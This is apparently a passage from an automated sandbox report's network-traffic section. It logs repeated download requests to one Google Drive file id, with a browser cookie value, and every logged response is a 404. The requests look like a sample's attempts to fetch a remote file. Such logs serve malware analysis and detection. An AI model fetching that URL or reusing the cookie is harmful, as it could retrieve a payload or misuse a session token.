      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global traffic | DNS traffic detected: DNS query: drive.google.com
      Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFIdbgQ5tTtxm5wj5DTEv-Nv4jj0VPWutfKq_Jo0teQ30BwXGcVOHnb3buB5hgoMcqA9Ymfn | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Sat, 11 Jan 2025 04:28:01 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Cross-Origin-Opener-Policy: same-origin | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Content-Security-Policy: script-src 'nonce-3bPcayjmvUMClbpbEpuo0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist | Content-Length: 1652 | Server: UploadServer | Set-Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4; expires=Sun, 13-Jul-2025 04:28:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSIL3L3et1jcTSjYxsyVm7jljsm6mguYH2OPW7zI44BbsZwkRdo05na2bmIgphK8NDAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:35 GMTContent-Security-Policy: script-src 'nonce-4mIxTvIU7EfXXX7pBguplg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSqY9Ex58tWnsi2z_d5zEYnAMyqUZj6HWOrkR5rFGKq2IOoA8_R8u2nzeyJq8GQCDUwkyuRz5wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7YRXiIlHp7-usUVliTPDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTUaiXexMFMCoqCIRTPADVtnnGXbcwmvIAlF7t7uJj3I6uskdOJpSTaGwWg5q0Ov28F-f83TAUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:40 GMTContent-Security-Policy: script-src 'nonce-3jU07yO4HtuUjBlGMVnmmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQjEfiC34FFgvbldZVzkNM8SdDcyeU9WwPbnC0tT-a_HHKqPBMFTQ9zZ_bS-46aJy3VkkbndnUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:42 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce--AE7jvXM4bG0xUBd2gWfgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41tdIZqWj2bJ9wxsCGeSj8fxuPMMV2NO7OKsxb5MghtivueGKB1A7M3sQkj3p39owpTNbcomsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-07V-w6NUHALSx7f_8lMhig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgReaQ4vW_gm9KMDtxSwu4swMG04TGFzMfNO1Rw_TIwdOy7lJOY50G1hHo2_tQIgGCh-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:47 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-NZxBQpieEWax83cT-Pyptg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRkmIAMlVcYHpK3iY-s1TKO0mVvpYHIJDELoOBL8JBsuWXHBJbAISvxi0jw8C5Q56ROContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-G17mHrrdCPJTaSnUkjj-Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTNrnN8o8l8VfOKBCFiTG82L0PDpFCMu2bqAn80o_z8fWYs32ddZh28UwI24Uy6lKVZP8soGB8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-PWz03kX-0s5EO-LAHtJd6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
